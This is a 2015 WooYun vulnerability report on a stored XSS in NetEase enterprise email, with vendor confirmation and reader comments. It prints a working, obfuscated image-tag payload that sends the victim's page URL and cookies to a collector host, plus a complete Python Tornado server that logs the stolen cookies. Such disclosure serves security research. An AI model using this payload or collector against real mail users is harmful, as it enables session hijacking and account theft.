当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106134

漏洞标题:网易企业邮箱储存型xss可获取用户cookie

相关厂商:网易

漏洞作者: zene

提交时间:2015-04-06 09:47

修复时间:2015-05-24 13:54

公开时间:2015-05-24 13:54

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-06: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

储存型xss啦~

详细说明:

邮件正文直接xss啦~
网易企业邮箱显示邮件正文时候会自动把 http://xxx.xxx 转换成 <a href="http://xxx.xxx" target="_blank">http://xxx.xxx</a>。但是转换不当导致同一行内的任意文本标签被转换为 html 元素。不多说,直接来:
POC:
邮件正文直接写

<img src='' onmouseover="eval(unescape('f%3DencodeURIComponent%2Cr%3Ddocument%2CN%3Dnew%20XMLHttpRequest%2CN.open%28%27post%27%2CdecodeURIComponent%28%27http%3A%252f%252f127.0.0.1%3A8000%27%29%2Ctrue%29%2CN.setRequestHeader%28%27content-type%27%2C%27application/x-www-form-urlencoded%27%29%2CN.send%28%27a%3D%27+f%28r.URL%29+%27%26t%3D%27+f%28r.cookie%29%29'))"></img>http://aoeu.com


注意后面的http://xxx.xxx是必须要有的,否则不会被尖括号不会被转义回来。onmouseover换成onerror也行,更直接。(但是我的ff似乎被玩坏了,不管哪里的onerror内容不执行了QAQ……chrome下可以)
简易服务器:

#!/usr/bin/env python3
import tornado
from tornado.ioloop import IOLoop
from tornado.web import Application
from threading import Lock
m = Lock()
class MainHandler(tornado.web.RequestHandler):
    def post(self):
        url = self.get_argument('a', default='')
        cookie = self.get_argument('t', default='')
        m.acquire()
        print('url:    {0}\n'.format(url))
        print('cookie: {0}\n\n'.format(cookie))
        with open('log', 'a') as f:
            f.write('url:    {0}\n'.format(url))
            f.write('cookie: {0}\n\n'.format(cookie))
        m.release()
        self.write('')
def main():
    app = Application([
        (r'/', MainHandler),
    ])
    app.listen(8000)
    IOLoop.instance().start()
if __name__ == '__main__':
    main()


2015-04-06-025710_980x425_scrot.png


2015-04-06-025733_1363x230_scrot.png

漏洞证明:

见说明。

修复方案:

正确处理超链接。

版权声明:转载请注明来源 zene@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-09 13:53

厂商回复:

感谢您对网易的关注,问题已经处理!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-06 12:50 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    这个屌

  2. 2015-04-06 13:11 | 随随意意 ( 普通白帽子 | Rank:160 漏洞数:35 | 我对XSS并非真爱(┬_┬)最近有人冒充该...)

    收费邮箱?

  3. 2015-04-06 17:33 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    屌啊

  4. 2015-04-06 19:38 | 小清新 ( 路人 | Rank:4 漏洞数:1 | 以后再写)

    mark刘茗

  5. 2015-04-06 20:27 | Ning ( 实习白帽子 | Rank:47 漏洞数:6 )

  6. 2015-04-06 21:12 | anony_mous ( 路人 | Rank:0 漏洞数:3 | no info)

    diao

  7. 2015-04-06 23:45 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    这种还没补完啊

  8. 2015-04-07 06:30 | catcat520 ( 路人 | Rank:20 漏洞数:4 | 大家好,我是刚学网络 00后,求照顾,谢谢)

    关注一下,顺便 @疯狗 我提交的储存型xss如果不能通过,是否能确认一下,一直是未审核怕管理员忽略了,谢谢

  9. 2015-04-07 10:44 | 毛猴 ( 实习白帽子 | Rank:63 漏洞数:18 | 一 只 怀 有 梦 想 的 猴 ......)

    dom dom

  10. 2015-05-09 13:59 | B1gstar ( 实习白帽子 | Rank:52 漏洞数:6 | 向各位学习来了。)

    这个没有奖励啊

  11. 2015-05-10 23:53 | zsrkmyn ( 路人 | Rank:18 漏洞数:3 | lazy...)

    @B1gstar 好像发了个礼品但是我没收到……话说玩意寄礼品是寄平邮还是快递啊?